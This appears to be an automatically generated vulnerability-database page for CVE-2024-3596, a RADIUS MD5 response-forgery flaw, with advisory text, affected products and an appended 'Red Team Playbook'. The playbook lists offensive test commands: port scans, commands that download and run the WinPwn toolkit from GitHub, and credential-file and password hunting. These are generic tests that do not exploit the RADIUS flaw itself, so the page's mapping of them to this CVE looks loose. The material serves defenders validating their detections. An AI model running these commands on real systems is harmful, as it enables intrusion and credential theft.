CVE-2024-3596
Overview
This vulnerability is a cryptographic forgery issue in the RADIUS protocol as specified in RFC 2865. The root cause is the use of the MD5 algorithm for the Response Authenticator signature, which is susceptible to chosen-prefix collision attacks. This flaw affects the validation mechanism of RADIUS Response packets, allowing modification of Access-Accept, Access-Reject, or Access-Challenge messages without detection.
Vulnerability Description
RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by a local attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.
Impact
An attacker on the local network can forge RADIUS Response packets, effectively bypassing authentication decisions by altering Access-Accept, Access-Reject, or Access-Challenge messages. This allows unauthorized network access or denial of legitimate access without requiring credentials or user interaction. The compromise can lead to unauthorized access to network resources, disruption of authentication services, and potential lateral movement within the affected environment.
Solution
According to Siemens Security Advisories SSA-794185 and SSA-723487, users should upgrade affected products to versions that disable or replace MD5-based Response Authenticators in RADIUS implementations. Specifically, FreeRADIUS and Broadcom products should be updated to versions that implement stronger cryptographic protections or alternative authentication methods. Administrators are advised to consult the referenced advisories for detailed patching instructions and apply vendor-recommended mitigations promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the RADIUS protocol, as defined by RFC 2865, presents a significant risk due to its susceptibility to forgery attacks. This issue arises from the use of the MD5 hashing algorithm for the Response Authenticator, which can be exploited through a chosen-prefix collision attack. In essence, a local attacker can manipulate valid responses—such as Access-Accept, Access-Reject, or Access-Challenge—by crafting a new response that is accepted by the RADIUS server. The reliance on MD5, a hashing algorithm known for its weaknesses, allows attackers to create two different inputs that produce the same hash output, thereby undermining the integrity of the authentication process.
Exploitation of this vulnerability can occur in various scenarios. An attacker with local network access could intercept RADIUS messages and modify them to gain unauthorized access to network resources. For instance, by altering an Access-Reject message to an Access-Accept message, the attacker could gain entry to systems or services that should otherwise be restricted. Additionally, the attacker could manipulate Access-Challenge messages to trick users into providing sensitive information, thereby facilitating further attacks such as credential theft or man-in-the-middle attacks. The potential for such exploitation underscores the critical need for vigilance in environments utilizing RADIUS for network access control.
The real-world impact of this vulnerability is profound, particularly for organizations relying on RADIUS for secure authentication. The high CVSS score of 9.0 indicates that successful exploitation could lead to severe consequences, including unauthorized access to sensitive data, disruption of services, and significant financial losses. Businesses that depend on the integrity of their authentication mechanisms may face reputational damage and regulatory scrutiny if they fail to address this vulnerability promptly. Furthermore, the ability of an attacker to forge responses could lead to a cascade of security breaches, affecting not only the immediate target but also interconnected systems and networks.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First, they should conduct thorough assessments of their RADIUS implementations, identifying any instances where the protocol is used and evaluating the security measures in place. Implementing stronger cryptographic algorithms, such as SHA-256, can significantly enhance the security of the Response Authenticator, reducing the risk of forgery attacks. Additionally, network segmentation and strict access controls can limit the potential for local attackers to exploit this vulnerability. Regular updates and patches to affected products, such as FreeRADIUS and Brocade's Fabric Operating System, are essential to ensure that known vulnerabilities are addressed promptly.
In conclusion, the vulnerability within the RADIUS protocol poses a serious threat to network security, particularly in environments where it is widely deployed. The potential for forgery attacks through chosen-prefix collision highlights the need for organizations to reassess their reliance on outdated cryptographic practices. By implementing robust detection and mitigation strategies, businesses can safeguard their networks against this and similar vulnerabilities, ensuring the integrity of their authentication processes and protecting sensitive data from unauthorized access.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Freeradius | Freeradius | All |
cpe:2.3:a:freeradius:freeradius:*:*:*:*:*:*:*:*
|
|
|
Broadcom | Brocade Sannav | N/A |
cpe:2.3:a:broadcom:brocade_sannav:-:*:*:*:*:*:*:*
|
|
|
Broadcom | Fabric Operating System | N/A |
cpe:2.3:o:broadcom:fabric_operating_system:-:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sonicos | N/A |
cpe:2.3:o:sonicwall:sonicos:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
alperenugurlu/CVE-2024-3596-Detector
|
alperenugurlu | 7 | 2 | 2024-07-09 | View |
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.